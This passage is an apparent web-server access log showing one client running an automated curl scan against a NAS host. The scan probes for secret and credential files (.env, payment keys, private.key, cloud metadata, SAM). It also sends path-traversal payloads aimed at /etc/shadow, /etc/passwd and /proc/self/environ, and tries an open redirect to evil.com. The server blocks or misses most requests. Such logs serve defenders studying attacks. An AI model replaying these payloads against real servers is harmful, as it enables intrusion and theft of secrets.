https nas.profibot.hu "/dapp/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/admin-console" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/etc/mutt/muttrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/platform/env-overrides.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/tfx/pipeline/pipeline_config.py" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/compliance/email_journal.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/connect/userinfo" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/finance/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/etc/istio/proxy/envoy-rev.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/settings/save?role=public" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/usr/local/apache2/conf/httpd.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/aliyun/email/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/static/js/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/etc/apache2/ports.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/smtp.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 403 403 - GET https nas.profibot.hu "/.boto" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/governance/proposals.md" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/config/mailjet.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 403 403 - GET https nas.profibot.hu "/..%252f..%252f..%252f..%252f..%252f..%252fetc/php.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/sap/settings.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/config/paypal.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/scheduler/torque.cfg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/dump.zip" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:24 +0000] - 404 404 - GET https nas.profibot.hu "/joomla/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/sites/default/settings.local.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/test.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/actuator" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/release.rar" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/escrow_rules.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/pom.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/config/braintree.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/sites/default/files/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/sketch.ino" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/googlepay/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/dao/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/coinbase-keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/customer/42/orders" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/account?user=admin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/login/jwt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - - 403 - GET https nas.profibot.hu "/oauth/logout?post_logout_redirect_uri=http://evil.com" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/test_logs/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/underwriting/policies.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - 404 404 - GET https nas.profibot.hu "/src/config/stripe.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:25 +0000] - - 400 - GET https nas.profibot.hu "-" [Client 185.177.72.49] [Length 154] [Gzip -] [Sent-to ] "-" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/eeg/signal_config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/etc/postfix/ssl/server.pem" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/////////////etc/hosts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/skrill/env.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - - 403 - GET https nas.profibot.hu "/?open=http://" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/genomics/pipeline.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/sap/smtpsettings.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/etc/dmarc.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/monday/integrations/mail.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/stager/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/etc/ssl/certs/mail.pem" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/proxy" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/api/payments/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/etc/sendmail/sendmail.cf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/index.php?option=com_content" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/jenkins_output/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/private.key" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/curl" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/stripe.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - 404 404 - GET https nas.profibot.hu "/pwa.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:26 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/wp-json/wp/v2/posts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/healthcare/device_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/neuro/api_keys.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 403 403 - GET https nas.profibot.hu "/.eslint.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/doppler.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/:15672" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/setup.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 403 403 - GET https nas.profibot.hu "/.pnpmfile.cjs" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/ros/launch/*.launch" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "///////windows/system32/config/SAM" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/traefik.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/virtualcards/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/cirq/calibration.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/splitpay/beneficiaries.csv" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 403 403 - GET https nas.profibot.hu "/.firebaserc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/clearinghouse/systems.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/plugins/wp-file-manager/readme.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/k8s/deploy.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/certbot/conf.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/sites/all/modules/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 403 403 - GET https nas.profibot.hu "/..%5c..%5c..%5c..%5c..%5c..%5cwindows/system32/config/SAM" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:27 +0000] - 404 404 - GET https nas.profibot.hu "/cloudflare.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/drupal/user" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/user/1/security/questions" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/internal/debug-admin.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/wp-admin/install.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/rspamd/override.d/headers.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 403 403 - GET https nas.profibot.hu "/..%5c..%5c..%5c..%5c..%5c..%5cetc/php.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/email.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 403 403 - GET https nas.profibot.hu "/.config/msmtp/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/charity/receipts.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/uploads/backup.zip" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 403 403 - GET https nas.profibot.hu "/.env.sample" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/auth/callback" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/oauth/device" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/config/feed-url.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/bower_components/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/flight-controller/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/etc/postgresql/14/main/postgresql.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/paypal/api_settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:28 +0000] - 404 404 - GET https nas.profibot.hu "/iap/products_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/config/cache.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/login.jsp" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/admin/dkim/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/documents/1234" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/config/cryptomus.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/settings/payment_gateway.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/ethereum/geth-config.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/meta-data/iam/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/sandbox/payments/test_keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/hf/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/ffmpeg/ffmpeg.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/pipeline/stage1/prep.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] 